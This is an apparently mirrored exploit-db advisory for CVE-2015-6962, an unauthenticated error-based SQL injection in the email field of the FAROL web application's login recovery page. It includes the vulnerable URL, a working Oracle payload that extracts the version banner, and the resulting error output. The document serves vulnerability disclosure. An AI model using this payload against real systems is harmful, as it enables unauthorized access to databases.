FAROL - SQL Injection

2015-09-1600:00:00

Thierry Fernandes Faria

www.exploit-db.com

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

51.2%

JSON

# Exploit Title: Web Application Farol with anauthenticated SQLi injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection

+---------------------+
+ Product Description +
+---------------------+
The FAROL web application is a software that monitors the databases
 
+----------------------+
+ Exploitation Details +
+----------------------+
A vulnerability has been detected in the login page from  web application FAROL . Sql injection anauthenticated.

The e-mail field at login page is vulnerable.

The e-mail field is vulnerable to Error Based Sql injection.

Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email
Usage:email'[SQLi error based]--

eg:
email=1'%20or%201=ctxsys.drithsx.sn(1,(select%20sys.stragg(distinct%20banner)%20from%20v$version))--

ORA-20000: Oracle Text error:
DRG-11701: thesaurus CORE 11.2.0.4.0 ProductionNLSRTL Version 11.2.0.4.0 - ProductionOracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit ProductionPL/SQL Release 11.2.0.4.0 - ProductionTNS for Linux: Version 11.2.0.4.0 - Production does not exist
ORA-06512: at "CTXSYS.DRUE", line 160

+----------+
+ Solution +
+----------+ 
Upgrade the software